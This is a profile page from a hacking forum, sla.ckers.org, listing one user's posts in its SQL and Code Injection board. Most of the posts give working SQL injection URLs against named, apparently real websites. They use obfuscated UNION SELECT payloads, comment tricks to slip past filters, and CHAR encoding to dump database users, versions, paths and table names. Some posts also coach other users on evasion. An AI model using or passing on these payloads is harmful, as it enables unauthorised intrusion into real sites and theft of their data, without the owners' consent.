Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Current Page: 1 of 1
Results 1 - 10 of 10
11 months ago
zikmik
http://wargame.balcan-underground.net/vesti.php?id=2 This is as far as I go: http://wargame.balcan-underground.net/vesti.php?id=2 and true http://wargame.balcan-underground.net/vesti.php?id=2 and false http://wargame.balcan-underground.net/vesti.php?id=2 group by 1-- http://wargame.balcan-underground.net/vesti.php?id=2 group by 2--
Forum: SQL and Code Injection
2 years ago
zikmik
No one here is your private army! Find some tutorial and LEARN!!!
Forum: SQL and Code Injection
2 years ago
zikmik
Try blind method...
Forum: SQL and Code Injection
2 years ago
zikmik
not vuln...
Forum: SQL and Code Injection
2 years ago
zikmik
http://www.clearviewgroup.ca/news.php?newsid=(-16)union(select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@datadir,@@tmpdir,@@basedir,@@version_compile_os))-- Use this order!!! 1. Learn English 2. Learn Basic of SQL 3. Ask question!!!
Forum: SQL and Code Injection
2 years ago
zikmik
http://www.theavguide.co.uk/view_page.php?page=-18+/*!unION*/%0A/*!selECT*/+1,2,TaBlE_NamE,4,5,6+FrOm+InfoRmaTion_ScHEma.TaBleS+WheRe+Table_SchEma=CHAR(116, 104, 101, 97, 118, 103, 117, 105, 95)+LIMIT+0,1-- use CHAR and LIMIT...
Forum: SQL and Code Injection
2 years ago
zikmik
nah, there is no WAF here, script accept only numbers for ID...
Forum: SQL and Code Injection
2 years ago
zikmik
http://www.ngclan.hk/news.php?nID=61+/*!AND*/+1=0+/*!unION*/+/*!selECT*/+1,2,3,grOUp_ConCat(/*!TaBlE_NamE*/),5,6,7+FrOm+InfoRmaTion_ScHEma./*!TaBleS*/+WheRe+Table_SchEma=DatAbAse()-- Don't be such a noob!!!
Forum: SQL and Code Injection
2 years ago
zikmik
Hi, I'm stuck here (403 Forbidden): http://www.amigoh.com/aboox/index.php?mod=verseim&read=yes&id=113+/*!AND*/+1=0+/*!unION*/+/*!selECT*/+1,2,3,4,5,6,7,8-- I manage to find another page on the same site that is vuln: http://www.amigoh.com/aboox/pview.php?id=191+/*!AND*/+1=0+/*!unION*/+/*!selECT*/+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8-- but I am still
Forum: SQL and Code Injection
2 years ago
zikmik
http://www.qs-qsr24.de/article.php?id=-4'+union+select+1,version(),3--+-&tab=news Cheers!
Forum: SQL and Code Injection
Current Page: 1 of 1